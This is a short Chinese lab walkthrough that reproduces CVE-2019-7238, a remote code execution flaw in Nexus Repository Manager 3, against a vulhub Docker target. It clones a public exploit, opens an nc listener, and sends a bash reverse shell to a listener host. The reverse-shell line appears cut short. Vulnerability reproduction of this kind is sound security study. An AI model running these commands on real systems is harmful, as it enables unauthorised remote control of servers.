一、漏洞概述
Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,可以简单的理解为Maven的私服。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。
漏洞发现
二、环境搭建
git clone https://hub.fastgit.org/vulhub/vulhub.git
cd vulhub/nexus/CVE-2019-7238
docker-compose up -d访问: http://192.168.25.207:8081/
触发该漏洞,必须保证仓库里至少有一个包存在。
三、漏洞复现
1、下载EXP
git clone https://github.com/mpgn/CVE-2019-7238.git修改 CVE-2019-7238.py 中的remote地址
2、监听端口
#Kali上监听端口
nc -lvvp 4444
3、执行exp脚本
python3 CVE-2019-7238.py执行脚本利用成功后,返回command (not reflected)>界面
4、再执行反弹脚本:
bash -i >& /dev/tcp/192.168.21.4/4444 0>&
5、漏洞利用成功!
